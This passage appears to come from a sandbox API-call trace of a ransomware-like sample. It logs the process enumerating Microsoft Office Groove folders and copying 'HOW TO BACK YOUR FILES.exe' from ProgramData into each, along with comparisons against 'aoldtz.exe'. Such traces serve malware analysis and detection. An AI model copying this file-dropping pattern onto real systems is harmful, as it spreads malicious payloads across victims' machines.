lpMem=0x2d1d98 | out: hHeap=0x2b0000) returned 1 [0071.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2700 | out: hHeap=0x2b0000) returned 1 [0071.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana") returned 104 [0071.456] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana" [0071.456] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.456] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.475] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5133d8d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c17ccc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c17ccc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.475] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.475] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.476] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3" [0071.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e3160 | out: hHeap=0x2b0000) returned 1 [0071.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0071.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3") returned 82 [0071.476] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3" [0071.476] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.476] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c1c8f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c1c8f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.483] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.483] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.486] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles" [0071.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0071.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0071.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles") returned 94 [0071.486] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles" [0071.486] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.486] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.495] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.495] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5127f1f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c1c8f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c1c8f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.495] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.495] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.496] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl" [0071.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d45b8 | out: hHeap=0x2b0000) returned 1 [0071.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2880 | out: hHeap=0x2b0000) returned 1 [0071.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl") returned 100 [0071.496] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl" [0071.496] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.496] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\swirl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.502] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.502] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Swirl\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5291c2f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c1ef0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c1ef0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.502] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.502] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.502] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2" [0071.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0071.502] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2860 | out: hHeap=0x2b0000) returned 1 [0071.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2") returned 99 [0071.502] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2" [0071.502] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.502] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\sts2\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.508] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.508] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\STS2\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c1ef0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c1ef0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.508] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.508] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.508] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen" [0071.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5fb0 | out: hHeap=0x2b0000) returned 1 [0071.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2840 | out: hHeap=0x2b0000) returned 1 [0071.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen") returned 106 [0071.508] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen" [0071.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\springgreen\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.513] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.513] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SpringGreen\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c215240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c215240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.513] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.513] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.513] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue" [0071.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d44e0 | out: hHeap=0x2b0000) returned 1 [0071.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2820 | out: hHeap=0x2b0000) returned 1 [0071.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue") returned 103 [0071.513] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue" [0071.513] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.513] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\softblue\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.519] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.519] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\SoftBlue\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c215240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c215240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.519] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.519] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate" [0071.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4408 | out: hHeap=0x2b0000) returned 1 [0071.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2800 | out: hHeap=0x2b0000) returned 1 [0071.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate") returned 100 [0071.519] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate" [0071.519] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.519] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\slate\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.533] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Slate\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c215240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c215240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.533] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.533] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.533] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis" [0071.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4330 | out: hHeap=0x2b0000) returned 1 [0071.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27e0 | out: hHeap=0x2b0000) returned 1 [0071.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis") returned 100 [0071.534] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis" [0071.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\oasis\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.566] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.566] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Oasis\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c287660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c287660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0071.567] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0071.567] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0071.567] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime" [0071.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0071.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d27c0 | out: hHeap=0x2b0000) returned 1 [0071.567] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime") returned 99 [0071.567] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime") returned="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime" [0071.567] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0071.567] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\lime\\how to back your files.exe"), bFailIfExists=1) returned 1 [0071.571] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.571] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Lime\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x528f6190, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5c2ad7c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5c2ad7c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 